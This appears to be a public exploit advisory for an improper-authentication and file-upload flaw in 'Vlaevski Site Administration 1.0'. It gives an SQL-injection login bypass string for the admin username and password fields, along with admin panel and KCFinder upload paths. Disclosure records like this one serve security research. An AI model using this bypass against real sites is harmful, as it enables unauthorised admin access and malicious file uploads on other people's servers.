Powered By Vlaevski Site Administration 1.0 Improper Authentication File Upload Vulnerability

2019.08.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-287

#################################################################### # Exploit Title : Powered By Vlaevski Site Administration 1.0 Improper Authentication File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 10/08/2019 # Vendor Homepage : vlaevski.com - scandinavia.bg # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-287 [ Improper Authentication ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Impact : *********** Authentication is any process by which a system verifies the identity of a user who wishes to access it. When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct and besides it allows upload a file on the system without administrator permission. Improper authentication occurs when an application improperly verifies the identity of a user. A software incorrectly validates user's login information and as a result, an attacker can gain certain privileges within the application or disclose sensitive information that allows them to access sensitive data and provoke arbitrary code execution. The weakness is introduced during Architecture and Design, Implementation stages. #################################################################### # Authentication Bypass / Admin Panel Login Bypass Exploit : ****************************************************** 2014 © Site Administration v1.0. Powered by Vlaevski.com Admin Panel Login Path : /admin/login.php Admin Username : '=''or' Admin Password : '=''or' /admin/index.php /admin/kcfinder/browse.php /admin/kcfinder/upload/files/.... /admin/index.php?page=menu_list /admin/index.php?page=menu_pics_list /admin/index.php?page=adm_users /admin/index.php?page=adm_users&edit= /?page=main&cat=[ID-NUMBER] #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top